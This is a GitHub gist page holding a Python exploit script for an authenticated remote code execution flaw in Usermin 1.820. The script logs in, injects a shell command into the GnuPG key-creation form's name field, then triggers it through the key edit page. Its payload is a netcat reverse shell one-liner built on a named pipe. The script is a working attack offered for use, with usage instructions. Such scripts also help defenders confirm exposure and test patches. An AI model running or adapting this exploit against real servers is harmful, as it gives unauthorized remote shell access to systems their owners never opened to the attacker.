Created
August 27, 2021 15:57
-
-
Save numanturle/5a6fc1ebc3b267e6480544e9c1f4cfe5 to your computer and use it in GitHub Desktop.
Usermin - Remote Code Execution (Authenticated) ( Version 1.820 )
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/python3 | |
# -*- coding: utf-8 -*- | |
# Usermin - Remote Code Execution (Authenticated) ( Version 1.820 ) | |
# author: twitter.com/numanturle | |
# usage: usermin.py [-h] -u HOST -l LOGIN -p PASSWORD | |
# https://youtu.be/wiRIWFAhz24 | |
import argparse,requests,warnings,json,re | |
from requests.packages.urllib3.exceptions import InsecureRequestWarning | |
from cmd import Cmd | |
warnings.simplefilter('ignore',InsecureRequestWarning) | |
def init(): | |
parser = argparse.ArgumentParser(description='Usermin - Remote Code Execution (Authenticated) ( Version 1.820 )') | |
parser.add_argument('-u','--host',help='Host', type=str, required=True) | |
parser.add_argument('-l', '--login',help='Username', type=str, required=True) | |
parser.add_argument('-p', '--password',help='Password', type=str, required=True) | |
args = parser.parse_args() | |
exploit(args) | |
def exploit(args): | |
listen_ip = "0.0.0.0" | |
listen_port = 1337 | |
session = requests.Session() | |
target = "https://{}:20000".format(args.host) | |
username = args.login | |
password = args.password | |
print("[+] Target {}".format(target)) | |
headers = { | |
'Cookie': 'redirect=1; testing=1;', | |
'Referer': target | |
} | |
login = session.post(target+"/session_login.cgi", headers=headers, verify=False, data={"user":username,"pass":password}) | |
login_content = str(login.content) | |
search = "webmin_search.cgi" | |
check_login_string = re.findall(search,login_content) | |
if check_login_string: | |
session_hand_login = session.cookies.get_dict() | |
print("[+] Login successfully") | |
print("[+] Setup GnuPG") | |
payload = "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc {} {} >/tmp/f;".format(listen_ip,listen_port) | |
#payload = "whoami;" | |
post_data = { | |
"name":'";{}echo "'.format(payload), | |
"email":"1337@webmin.com", | |
} | |
print("[+] Payload {}".format(post_data)) | |
session.headers.update({'referer': target}) | |
create_secret = session.post(target+"/gnupg/secret.cgi", verify=False, data=post_data) | |
create_secret_content = str(create_secret.content) | |
search = "successfully" | |
check_exp = re.findall(search,create_secret_content) | |
if check_exp: | |
print("[+] Setup successful") | |
print("[+] Fetching key list") | |
session.headers.update({'referer': target}) | |
key_list = session.post(target+"/gnupg/list_keys.cgi", verify=False) | |
last_gets_key = re.findall("edit_key.cgi\?(.*?)'",str(key_list.content))[-2] | |
print("[+] Key : {}".format(last_gets_key)) | |
session.headers.update({'referer': target}) | |
try: | |
key_list = session.post(target+"/gnupg/edit_key.cgi?{}".format(last_gets_key), verify=False, timeout=3) | |
except requests.exceptions.ReadTimeout: | |
pass | |
print("[+] 5ucc355fully_3xpl017") | |
else: | |
print("[-] an unexpected error occurred" ) | |
else: | |
print("[-] AUTH : Login failed.") | |
if __name__ == "__main__": | |
init() |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment